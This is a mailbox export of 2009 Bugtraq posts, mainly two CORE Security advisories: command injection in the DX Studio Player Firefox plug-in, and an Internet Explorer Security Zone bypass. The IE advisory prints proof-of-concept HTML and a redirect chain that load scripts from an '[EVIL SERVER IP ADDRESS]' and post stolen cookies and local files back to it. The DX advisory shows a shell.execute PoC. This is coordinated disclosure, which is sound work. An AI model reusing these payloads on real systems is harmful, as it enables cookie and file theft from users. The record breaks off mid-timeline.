Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:
> .html can be crafted to force a unaware user to read file from local, and then possibly send it to a server.
Yup, this is an unfortunate, legacy property, not specific to any
particular browser; it is also fairly well-known and documented; see:
http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy
(multiple sections discussing file: access rules, including
XMLHttpRequest, DOM access, etc)
http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
/mz
From - Wed Jun 10 10:37:21 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008249
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40597-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 71DF3ED981
for <lists@securityspace.com>; Wed, 10 Jun 2009 10:35:56 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7B43F237057; Wed, 10 Jun 2009 08:30:55 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11982 invoked from network); 9 Jun 2009 21:21:14 -0000
Message-ID: <4A2ED1C9.3080509@coresecurity.com>
Date: Tue, 09 Jun 2009 18:19:05 -0300
From: CORE Security Technologies Advisories <advisories@coresecurity.com>
Organization: CORE Security Technologies
MIME-Version: 1.0
To: full-disclosure@lists.grok.org.uk,
bugtraq <bugtraq@securityfocus.com>
Subject: CORE-2009-0521 - DX Studio Player Firefox plug-in command injection
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
DX Studio Player Firefox plug-in command injection
1. *Advisory Information*
Title: DX Studio Player Firefox plug-in command injection
Advisory ID: CORE-2009-0521
Advisory URL:
http://www.coresecurity.com/content/DXStudio-player-firefox-plugin
Date published: 2009-06-09
Date of last update: 2009-06-09
Vendors contacted: Worldweaver
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Command injection
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-2011
3. *Vulnerability Description*
DX Studio [1] is a complete integrated development environment for
creating interactive 3D graphics. DX Studio Player plug-in for Firefox
[2] is vulnerable to a remote command execution vulnerability.
4. *Vulnerable packages*
. DX Studio Player v3.0.29.0
. DX Studio Player v3.0.22.0
. DX Studio Player v3.0.12.0
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. DX Studio Player v3.0.29.1
6. *Vendor Information, Solutions and Workarounds*
On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1
for all new downloads to fix the problem with the Firefox plugin, and
also posted a sticky announce for all its users [3].
7. *Credits*
This vulnerability was discovered and researched by Diego Juarez from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
DX Studio is a complete integrated development environment for creating
interactive 3D graphics. DX Studio provides a javascript API in which
the method 'shell.execute()' is defined as follows:
/-----------
Prototype:
shell.execute(commandString, [paramString], [commandIsProgId]);
- -----------/
This method sends the 'commandString' to the Windows shell with optional
parameters in 'paramString'. For security reasons, this function is not
available when running in a web browser. If you set 'commandIsProgId' to
true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with
parameter 'play' would play a DVD in Windows Media Player.
In our tests, despite what is stated in the documentation, we found that
the function is actually available to both the Internet Explorer and
Firefox browser plug-ins. In the IE plug-in the user does get a warning
about the security implications of allowing such '.dxstudio' file to
run. On Firefox however, there is no such warning whatsoever, allowing
an attacker to execute arbitrary code on the client side by luring the
victim into clicking a link or visiting a malicious website.
8.1. *Proof of Concept (header.xml)*
/-----------
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" width="800" height="600"
defaultscriptlanguage="javascript">
<display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no"
maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes"
changeresolution="no" userresize="yes" workarea="no" windowmask="no"
src="" minplayerversion="1.0.0">
<loading console="yes" custom="no" custombackground="no"
customlogo="yes" showversion="no">
<prop id="background" type="color" r="0" g="0" b="0" a="1" />
<logo src="" />
<customprogress />
</loading>
</display>
<script>
<![CDATA[function onInit()
{
shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")
} ] ]>
</script>
<licenseinfo stamp="cgdaaaaa" />
<security>
<prop id="password" type="string" value="" />
<prop id="allowplayer" type="bool" state="no" />
<prop id="nocache" type="bool" state="yes" />
</security>
</dxstudio>
- -----------/
Note: The security vulnerability is also exploitable on the standalone
player, however, this functionality appears to be the expected behavior
and fully intended for the standalone player.
9. *Report Timeline*
. 2009-05-21:
Core Security Technologies notifies the Worldweaver Support Team (WST)
of the vulnerability and announces its initial plan to publish the
content on June 15th, 2009.
. 2009-05-26:
The WST asks Core for a technical description of the vulnerability.
. 2009-05-26:
Technical details sent to WST by Core.
. 2009-06-08:
Core asks WST for an estimated date to fix this issue.
. 2009-06-08:
WST notifies Core that a fix has already been produced and it is
available to the users.
. 2009-06-09:
The advisory CORE-2009-0521 is published.
10. *References*
[1]
http://www.dxstudio.com.
[2]
http://www.dxstudio.com/download2.aspx.
[3]
http://www.dxstudio.com/forumtopic.aspx?topicid�152459-fb5f-4933-b700-b3fbd54f6bfd
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla -
http://enigmail.mozdev.org
iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q
PMPteYbShbRU4j4tIk93HPM=Mx5G
-----END PGP SIGNATURE-----
From - Wed Jun 10 10:57:24 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000824a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40598-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id A3E39EDA93
for <lists@securityspace.com>; Wed, 10 Jun 2009 10:47:24 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 2505E237090; Wed, 10 Jun 2009 08:31:08 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12510 invoked from network); 9 Jun 2009 21:28:42 -0000
Message-ID: <4A2ED384.8010107@coresecurity.com>
Date: Tue, 09 Jun 2009 18:26:28 -0300
From: CORE Security Technologies Advisories <advisories@coresecurity.com>
Organization: CORE Security Technologies
MIME-Version: 1.0
To: full-disclosure@lists.grok.org.uk,
bugtraq <bugtraq@securityfocus.com>
Subject: CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Internet Explorer Security Zone restrictions bypass
1. *Advisory Information*
Title: Internet Explorer Security Zone restrictions bypass
Advisory ID: CORE-2008-0826
Advisory URL:
http://www.coresecurity.com/content/ie-security-zone-bypass
Date published: 2009-06-09
Date of last update: 2009-06-09
Vendors contacted: Microsoft
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Client side
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: 33178
CVE Name: CVE-2009-1140
3. *Vulnerability Description*
Internet Explorer (IE) is the most widely used Web browser, with an
estimated count of 1,100 million users according to a worldwide survey
conducted and published in 2008 [1]. This advisory describes a
vulnerability that provides access to the contents of any file stored in
the local filesystem of user's machines running vulnerable versions of IE.
Exploitation of the vulnerability relies solely on the ability for a
would-be attacker to provide malicious HTML content from a website and
to predict the full pathname for the file that will be used to cache it
locally on the victim's system. If the entire path name can be
predicted, the attacker can cause a redirection to the locally stored
file using an URI specified in UNC form and force the local content to
be rendered as an HTML document, which will permit to run scripting
commands and instantiate certain ActiveX controls.
As a result of a successful attack, security or privacy-sensitive
information can be obtained by an attacker including but not limited to
user authentication credentials for any web application domain, HTTP
cookies, session management data, cached content of web applications in
different domains and any files stored on local filesystems.
The bug is related to a lack of enforcement of security policies
assigned to URL Security Zones [2] when content from the corresponding
zone is loaded and rendered from a local file. These issues have been
found in the way that security policies are applied when a URI is
specified in the UNC form (i.e., '\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'):
1. When a remote site attempts to access a local resource, IE will
fail to enforce the Zone Elevation restrictions.
2. When browsing a remote site, IE will not properly enforce the
Security Zone permissions, allowing a site belonging to a less secure
zone to be treated as belonging to a more privileged one.
4. *Vulnerable packages*
. Internet Explorer 5.01 Service Pack 4
. Internet Explorer 6.0
. Internet Explorer 6.0 Service Pack 1
. Internet Explorer 7 (not exploitable with Protected mode on,
available on Vista)
4.1. *Vulnerable platforms*
. Microsoft Windows 2000 up to and including Service Pack 4
. Microsoft Windows Server 2003 up to and including Service Pack 2
. Microsoft Windows XP up to and including Service Pack 3
. Windows Vista up to and including Service Pack 1 (not exploitable
with IE running with Protected mode on)
. Windows Server 2008
5. *Non-vulnerable packages*
. Internet Explorer 8 under Windows 2000/2003/XP/Vista
6. *Vendor Information, Solutions and Workarounds*
The following workarounds can prevent exploitation of the vulnerability:
. Use Internet Explorer's Protocol Lockdown feature control to
restrict the "file" protocol to prevent HTML from UNC path to run script
or ActiveX controls.
. Set the Security Level setting for the Internet and Intranet Zones
to High to prevent IE from running scripts or ActiveX controls.
. Manually disable Active Scripting for the Internet and Intranet
Zone with a custom security setting.
. Only run IE in Protected Mode if it is available on the operating
system.
. Use a different web browser to navigate untrusted web sites.
Additionally, although disabling file sharing if it is not necessary and
filtering outbound SMB connections at the endpoint or network perimeter
may not prevent exploitation it is generally a good security measure to
prevent disclosure of sensitive information such as valid usernames of
endpoint users.
Microsoft has issued a patch to fix the vulnerability and a detailed
description of how to implement the workarounds on IE. It is available
as Security Bulletin
http://go.microsoft.com/fwlink/?LinkID�0860.
Microsoft's Research and Defense blog has further discussion about the
vulnerability, workarounds and mitigations [3].
7. *Credits*
This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Consulting Services (SCS). Additional research
was made by Federico Muttis from Core Security Exploit Writers Team (EWT).
8. *Technical Description / Proof of Concept Code*
Internet Explorer uses a feature known as URL Security Zones [2], which
defines a set of privileges for Web sites and applications depending on
their apparent level of trustworthiness. The zones available in the
product include:
. *Internet Zone: * For Web sites on the Internet that do not belong
to another zone.
. *Local Intranet Zone: * For content located on an organization's
intranet.
. *Trusted Sites Zone: * For content located on Web sites that are
considered more reputable or trustworthy than other sites on the Internet.
. *Restricted Sites Zone: * For Web sites that contain content that
can cause (or have previously caused) problems when downloaded.
. *Local Machine Zone: * This is an implicit zone for content that
exists on the local computer and it is not directly configurable through
Internet Explorer security options by the user.
Internet Explorer users or Administrators can assign specific websites
or domains to any of the available zone except the Local Machine Zone.
The ability for a given website to perform security-sensitive operations
on the web browser is determined by the *Security Level* of the zone to
which the site was assigned. Each zone can be set to one of three preset
security levels (High, Medium-High, Medium) or to a custom level with
security policy settings specified by the user or administrator.
By default, all websites that are determined not to be in the Local
Intranet zone and are not explicitly listed in the Restricted Sites or
Trusted Sites zones are assigned the *Internet Zone* which has a default
security setting of Medium-High. Thus, for most IE users the
security-sensitive actions that a browser is allowed to perform while
connected to an untrusted Internet site are those specified by the
security policies of the Internet Zone at the Medium-High security level.
There are some issues in the way IE enforces zone security policies when
an URI is specified in the UNC form (i.e.,
'\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'). In this case, Internet
Explorer classifies as *Internet Zone* any UNC address pointing to an IP
address including '127.0.0.1'. As a result, any website (belonging to
any security zone) can address and redirect the navigation flow to files
stored in '\\127.0.0.1'.
If an attacker controlling a website finds a way to store HTML with any
valid scripting code the local file system of the visitor and then
redirects the browser's navigation flow that local file
('\\127.0.0.1\full_file_name'), then this code will be loaded and
rendered as if it belonged to the *Internet Zone* but since the file
containing it is stored in '\\127.0.0.1' it would also be able to access
any other file on the visitor's file system.
The problem is derived from the sequence of actions performed by
Internet Explorer to determine the content-type of the content to be
loaded and the appropriate way to render it. The algorithm followed for
this purpose is described in Microsoft's Knowledgebase article titled
MIME Type Detection in Internet Explorer [4] and implemented in the
function 'FindMimeFromData' in 'URLMON.DLL'[5].
In the following section, proof of concept code is provided to
demonstrate the problem using the local storage used by Internet
Explorer to store the user's browsing history to deliver HTML with
scripting code and force IE to render it. This analysis is valid for any
Windows NT based operating system but should be slightly modified to run
under Windows Vista. It takes advantage of the following features:
1. The IE user's browsing history is compounded of different files
and folders. One of these files is named 'index.dat', and is usually
located at: 'C:\Documents and settings\USERNAME\Local
settings\History\History.IE5\index.dat'. Although the format of this
file is not entirely text, IE will store every visited URL including any
parameters in the query string in plain text.
2. Although the aforementioned folder cannot be directly browsed
using Windows Explorer or Internet Explorer, it can be browsed and
viewed by referring to the same folder using the UNC notation:
'\\[COMPUTERNAME|127.0.0.1]\C$\Documents and settings\USERNAME\Local
settings\History\History.IE5'.
3. There are some HTML tags which allow to embed contents from
external files and treat them with a specific format disregarding the
file extension. For example, the HTML '<object/>' tag:
/-----------
<object data="index.dat" type="text/html" width="100%" height="50"></object>
- -----------/
It allows to set the MIME type (in the type attribute) of an externally
referenced file in the data attribute which will be loaded as an object.
4. Internet Explorer behaves in a slightly different way when
displaying a page directly rather than displaying that page inside an
HTML '<frame>' tag. For example, a page containing an HTML '<object>'
tag like the one shown below will prompt the user to accept the download
of file being referenced inside if loaded directly but it will be
automatically downloaded and rendered according to the specified MIME
type if the page is loaded inside an HTML '<frame>' tag.
5. Internet Explorer will determine the security zone of an UNC
address as belonging to:
a. The *Internet Zone* if the path refers to the target using an
IP address, for example '\\127.0.0.1'.
b. The *Local Intranet Zone* if the path refers to the target
using a NetBIOS name, for example '\\COMPUTERNAME'.
8.1. *Proof of Concept Code*
The following proof of concept code demonstrates that by enticing a user
to do a single click on a malicious website it is possible to retrieve
every HTTP cookie from the unsuspecting victim user. The PoC uses
VBScript to show the ability to steal sensitive information from any
local files with either text or binary contents.
There are several steps involved in order to make the attack path clear.
The following diagram shows the files involved and the calling order.
Details concerning the relationship between these files will be
explained along the walkthrough:
/-----------
See the figure in
http://www.coresecurity.com/content/ie-security-zone-bypass
- -----------/
Everything starts when the victim user points her browser to the
following URL:
/-----------
http://[EVIL SERVER IP ADDRESS]/evilsite.htm
- -----------/
This page will trigger SMB requests against our evil server to extract
the victim's 'USERNAME'. The script named 'captureSMB.pl' running in the
server will be the one in charge of processing these requests to create
the 'index.dat.english.pl' file which will be used later to redirect the
victim's browser to the locally stored index.dat file.
However, the main objective of this page is to set (when redirecting to
the next page) HTML code inside the victim's history index.dat file. The
HTML source code to accomplish such tasks would look very much like the
following:
/-----------
<html>
<head>
<script>
function redirectNow(){
document.location = '
http://[EVIL SERVER IP ADDRESS]/setForm.htm\?[HTML
CODE];
}
</script>
</head>
<body onload="javascript:redirectNow();">
<img src="\\[EVIL SERVER IP ADDRESS]\thereisnosuchfile.gif">
</body>
</html>
- -----------/
In turn, the next files in the redirecting chain ('setSecondScript.htm'
and 'setFirstScript.htm' ) will also be used to accomplish the same
second objective as the starting page. As stated before this will result
in the victim's 'index.dat' history file storing the HTML code passed
inside the query string in plaintext. The HTML code stored up to this
point would look like this:
/-----------
<form name='frmUpload' id='frmUpload' action='
http://[EVIL SERVER IP
ADDRESS]/newcgi.pl' method='post' enctype='multipart/form-data'>
<input type='hidden' name='data' id='data'>
<input type='submit' value='Submit'>
</form>
<script language='vbscript' src='
http://[EVIL SERVER IP ADDRESS]/
stealcookies.vbs'></script>
<script language='vbscript' src='
http://[EVIL SERVER IP ADDRESS]/
scripty.vbs'></script>
- -----------/
At this point, the victim's browser will be served with
'setFirstScript.htm'. This page will just redirect the browser to
another page ('frameset.htm'), which simply defines the frames where the
last page ('object.htm') referencing the 'index.dat' file will be loaded
into.
The HTML code used for loading the index.dat file and rendering it as
HTML code is just a simple HTML '<object>' tag:
/-----------
<object data="index.dat.english.pl" type="text/html" width="100%"
height="50"></object>
- -----------/
As can be seen, this is the file we generated in the first step based
upon the actual 'USERNAME' we obtained. In turn, this file will just
redirect the request to the victim's 'index.dat':
/-----------
Status: 302 Found
Content-type: text/html
Location:
file://[127.0.0.1|COMPUTERNAME]/C$/Documents%20and%20settings/USERNAME/Local%20settings/History/History.IE5/index.dat
- -----------/
This indirection level is required to avoid Internet Explorer from
prompting the user to download the target file.
If loaded, the file will execute under the *Internet
Zone* with the access rights of such zone but, given that the file
is served from the local disk, with the ability to read any file in the
local drive. However, success of the attack will depend on the ability
to obtain or guess the right username as explained later.
By taking advantage of these sequence of actions, the script named
'scripty.vbs' will read the victim's 'index.dat' located at
'C:\Documents and settings\USERNAME\Cookies\' which indexes the whole
set of HTTP cookie files managed by IE and send it back to the malicious
server using an HTML '<form>' we have set previously. At the server
side, the PERL script named 'newCGI.pl' will:
. process the received file, and store it in the server;
. create the script named 'stealcookies.vbs' considering the cookies
filenames gathered from the stolen file;
. redirect the victim's browser back to the 'framset.htm' page.
This time, when the victim's history 'index.dat' file is rendered again,
the script 'stealcookies.vbs' will be loaded. This script will read
every single cookie file the user has stored in the aforementioned
Internet Explorer cookie's folder and will send the contents back to the
server using the same HTML '<form>' used before. On the server side the
one in charge of processing this data will be the Perl script named
'newCGI.pl'. This time, it will:
. Process the received file, and store it in the server under the
name of 'stolen.txt';
. Redirect the victim's browser back to this file.
8.2. *Obtaining the right USERNAME*
To get the right username, we can take advantage of some other
idiosyncrasies of Internet Explorer. If it is possible to make outbound
SMB requests to an untrusted web server we can leverage that to include
inside the main page some references to inexistent resources in our
server. The client will attempt to establish a SMB connection against it
from where the 'USERNAME' could be obtained as well as some other useful
data such as the 'COMPUTERNAME' or the ciphered challenge/response.
Our proof of concept contemplates 2 possibilities:
1. The victim's machine is able to establish a connection to the port
445 (NetBIOS over TCP/IP) on the malicious server in which case the
correct 'USERNAME' can be obtained to build the right UNC path to the
'index.dat' file:
/-----------
\\127.0.0.1\C$\Documents and settings\USERNAME\Local
settings\History\History.IE5\index.dat
- -----------/
2. The port 445 is not allowed for outbound connections in which case
the code will simple try to guess the right username using common names
such as Administrator to build an UNC path like the following:
/-----------
\\127.0.0.1\C$\Documents and settings\Administrator\Local
settings\History\History.IE5\index.dat
- -----------/
In both cases, the file will be rendered as belonging to the *Internet
Zone*.
8.3. *Proof of Concept Files*
The Proof of Concept can be downloaded from
http://www.coresecurity.com/files/attachments/PoC-CORE-2008-0826.zip.
This would be a package with the following files:
. 'evilsite.htm': The main page, which shots the SMB requests and
redirects to 'setForm.htm' passing, as part of the query string, HTML
code to be set in the history 'index.dat' file.
. 'setForm.htm': This page acts as a bridge (receives the evil
scripting code as a query string parameter) and redirects to
'setSecondScript.htm' passing HTML code to be set in the history
'index.dat' file.
. 'setSecondScript.htm': This page acts as a bridge (receives the
evil scripting code as a query string parameter) and redirects to
'setFirstScript.htm' passing HTML code to be set in the history
'index.dat' file.
. 'setFirstScript.htm': This page acts as a bridge (receives the evil
scripting code as a query string parameter) and just redirects to
'frameset.htm'.
. 'frameset.htm': This page defines the frames where the page trying
to access the 'index.dat' file will be loaded into.
. 'stealCookies.htm': Same as frameset.htm, this page defines the
frames where the page trying to access the 'index.dat' file will be
loaded into.
. 'object.htm': The page to be loaded in 'frameset.htm'. It covers
the test cases 1 and 2 explained above in this document.
. 'captureSMB.pl': This script must be running in the example server.
It will be listening for SMB requests, and when they occur, will create
a pair of 'index.dat.[LANG].pl' files, attempting to cover a couple of
Windows OS languages.
. 'newCGI.pl': This file will handle the files received from
scritpy.vbs, generate the script named 'stealcookies.vbs' and, in a
subsequent call, will receive and store the stolen cookies.
. 'scripty.vbs': A script file loaded by the HTML code written in the
'index.dat' file. It will send the victim's cookies 'index.dat' file
back to the server.
. 'index.dat.english.default.pl': A redirect to the file assuming the
user Administrator under an English language Windows version.
. 'index.dat.spanish.default.pl': A redirect to the file assuming the
user Administrador under a Spanish language Windows version.
9. *Report Timeline*
. 2008-10-08:
Core Security Technologies notifies the Microsoft Security Response
Center (MSRC) that a vulnerability has been found in Internet Explorer
(IE). Core sends a draft security advisory with technical details and
PoC files and announces its initial plan to publish the advisory on
December 1st, 2008.
. 2008-10-09:
The MSRC acknowledges notification.
. 2008-10-09:
MSRC states that it is currently investigating the reported issue.
. 2008-10-14:
MSRC announces the investigation was completed. The flaw can be
reproduced by the vendor and it is considered a bulletin class issue.
. 2008-10-14:
MSRC announces that the vendor will not be able to hit a December
release date due to the mandatory quality test cycle required for IE
updates.
. 2008-10-16:
Core asks MSRC for an estimated date to fix these issues.
. 2008-11-04:
Core requests an answer to the previous mail and also details about:
1. the root cause of the problem,
2. the list of affected platforms, and
3. the severity rating Microsoft has assigned to the bug.
. 2008-11-05:
MSRC responds that patches to IE ship every two months and the next
available ship date will be February 10th. The case is currently rated
as an Important class Information Disclosure vulnerability. Vendor
provides a list of affected components and platforms. The MSRC was able
to reproduce this issue on all IE versions with the following
exceptions: IE7 and IE8 in Windows Vista when Protected Mode is ON. In
spite of that MSRC does not include IE8 in list of affected components
because it is still a beta product.
. 2009-01-08:
Core asks MSRC if it is still on track to release patches on February
10th, 2009.
. 2009-01-09:
MSRC responds that the out-of-band fix released in December [6] took a
lot of the resources that were assigned to February's release schedule
and will not be able to meet the February release date. MSRC informs the
next available release date would be April 14th, 2009.
. 2009-03-23:
Core asks MSRC if it is still on track to release fixed versions on
April 14th.
. 2009-03-26:
MSRC responds the product team addressed this issue in IE8 [7] with the
plan to port that code fix down-level (IE7, IE6 and IE5). In order to
accomplish these fixes in the previous IE versions, MSRC informs Core
the first available scheduled release in the future will be in June, 2009.
. 2009-03-26:
Core indicates that the previous email from MSRC is quite confusing. It
seems to indicate that the vulnerability is already fixed in IE8 whereas
at the time of the original report IE8 was still a beta product and
there was not any communication from MSRC indicating whether the problem
was going to be fixed nor a tentative date for such fix. Core asks MSRC
to confirm that the vulnerability was indeed fixed in the released
version of IE8 while two consecutive tentative released date for patches
to the officially confirmed vulnerable versions IE5 to IE7 have been
missed. In the case of such confirmation Core also asks clarification
about Microsoft's previously stated policy of releasing fixes for all
vulnerable versions at the same time as indicated in the emails
exchanged during the reporting process of a IE vulnerability closely
related to this one that Microsoft catalogued as an Outlook
Express/Windows Mail bug [8]. Core indicates that it considers that an
8-month release cycle is well beyond the reasonable time frame to issue
fixes for a bug that it considered rooted at the same cause of a
previously reported one, for which differences in its technical analysis
were not resolved because Microsoft repeatedly ignored request for a
technical root cause analysis. Therefore, pending answers to the above
questions and specific technical details about the root cause of the
problem and when, how and which platforms have the bug fixed Core will
proceed with publication on April 14th as previously agreed. In the
meantime Core will further investigate the issue in order to provide
customers, ISVs and the security community all the necessary information
to assess their risk and independently devise fixes, workarounds or
mitigations.
. 2009-04-08:
Core requests an answer to the previous mail. Core is on track to
publish the security advisory and would like confirmation that the
released version of IE8 fixed the bug.
. 2009-04-08:
MSRC notifies Core that the reason why IE8 did ship with this fix ahead
of the down-level versions was because IE8 was already in-development
and it was safer and cleaner to check in this fix into the existing
development cycle of IE8. MSRC also confirms that the bug is fixed in
the currently released version of IE8 and it is currently being
back-ported to the down-level versions of IE. MSRC indicates that it
does not document security fix changed in the latest products if the
vulnerability continues to exist in down-level support platforms which
helps Microsoft to "not zero-day the down-level platforms" and gives the
opportunity to provide updates for them. MSRC states that the vendor is
currently in the path to release the update in June and would appreciate
it if it could coordinate the release of Core's advisory on that same time.
. 2009-04-13:
Core notifies that probably the advisory will be released in a week
although the final decision has not been made yet and that a vendor
statement and workarounds would be highly appreciated. Core is working
on the final version of the advisory and would like to improve the
workaround and mitigation sections, for that purpose it is requesting
assistance from the vendor. Core asks MSRC for mitigation and
workarounds for users not running IE8. It also notifies that upon
further research it found a variation of the original attack that may
still compromise the original release of IE8. Other versions of IE8
(with the same version and build number) do not seem to be vulnerable to
the attack variation. The 'non-vulnerable' instance of IE8 tested was
patched by Windows auto-update in or around April 7th. Core asks MSRC to
confirm whether the original IE8 release was vulnerable to bug and the
bug later silently fixed by an update shipped through Windows auto-update.
. 2009-04-14:
MSRC asks Core more details about the version of IE8 that was
successfully compromised by a variation of the original attack. The MSRC
notifies the original attack was addressed in the RC1 version of IE8 and
wants to make sure there is not an issue with the fix.
. 2009-04-14:
MSRC indicates that received verification from the product team that
Protected Mode ON for the Internet Zone does block the attack in IE7.
The vendor states that it is currently investigating the IE8 specific
mitigations. With regards to IE8 the product team included the fix in RC
of IE8 which was released in January and it is unsure about the
differences between vulnerable and non-vulnerable instances of IE8. The
product team is still working on the fixes for the next release but MSRC
would like to make private binaries available for testing in the event
that Core postpones publication of the advisory. MSRC offers to setup a
conference call to discuss some of the challenges of fixing this bug and
why it required in-depth investigation.
. 2009-04-16:
Core Security and the Secure Windows Initiative (SWI) discuss this issue
in a conference call. The vendor states that it will obtain a list of
non-security updates released for IE8 post RTM and obtain a similar list
for Office and Windows since April 1st. The goal is to understand
whether a non-security update has fixed a security bug. The vendor will
also provide the technical description and the private fixed bits for
this specific issue when available. Core is going to provide (in the
next couple of days) the version of the IE8 that seems to be affected by
this issue, and the modified PoC that was used to reproduce the problem
on IE8. Core will inform MSRC of publishing date for the corresponding
security advisory when the decision is made.
. 2009-04-17:
Core sends technical details, the list of fixes installed on vulnerable
and non-vulnerable systems and modified Proof of Concept that works on
certain versions of IE8 RTM and does not on others. In both cases the
version and build number are exactly the same. Core have also found
that, although the PoC sent to MSRC in the original report does not work
on IE8 RTM, a variation of it continues to work in certain cases.
Basically, it seems that IE8 RTM prevented code from being executed from
'index.dat' mapped anywhere lower than an 0x4000 offset but if the
offending code is above 0x4000 and not from 'index.dat' it can still be
executed.
. 2009-04-17:
MSRC notifies there were two updates released at the end of March. One
was a Compatibility View List [9] and the second was an SPAD fix [10]
that affects Vista X64 only. Vendor also notifies they are going to
investigate whether this might have impacted the original attack vector.
The technical analysis of the problem determined that the HTML engine
checks the mime type for file it cannot handle and if there is not a
match MIME sniffing is performed without a predetermined hint, unknown
files are treated as HTML due to the redirection and in absence of a
specific content-type MIME-sniffing will end up defaulting to text/html.
. 2009-04-22:
MSRC sends patched binaries for Vista/IE7. These binaries are the fix
for the first issue submitted by Core and do not fix the second PoC sent
by Core the previous week. MSRT also provides some workarounds for the
first PoC reported. The IE team has investigated the additional PoC and
has determined that while functionally it appears the same as the
original issue submitted, when debugged the actions taken by the system
are controlled by different functions, and this difference is
significant enough to perform further investigation. The vendor asks to
re-schedules the advisory publication date to June 2009.
. 2009-04-22:
MSRC asks additional details about the attack vectors discussed between
Core and the Secure Windows Initiative (SWI) in the last conference call
(16th, April). MSRC indicates that it has identified two workarounds for
the original issue: Disabling scripting (which is default for Enhanced
Security Configuration on Windows 2003 and Windows Server 2008) and
disabling "Run ActiveX Controls and plugins". The IE team has
investigated the second PoC and determined that the functionality
appears the same but when debugged the actions performed by the system
are different. The differences are considered significant enough to
perform further investigation. MSRC proposes to release the fix for the
issue originally reported in June and to continue investigation on the
second PoC afterwards.
. 2009-04-23:
Core responds that, according to the technical information provided by
the IE team it appears that the problem could be exploitable with *any*
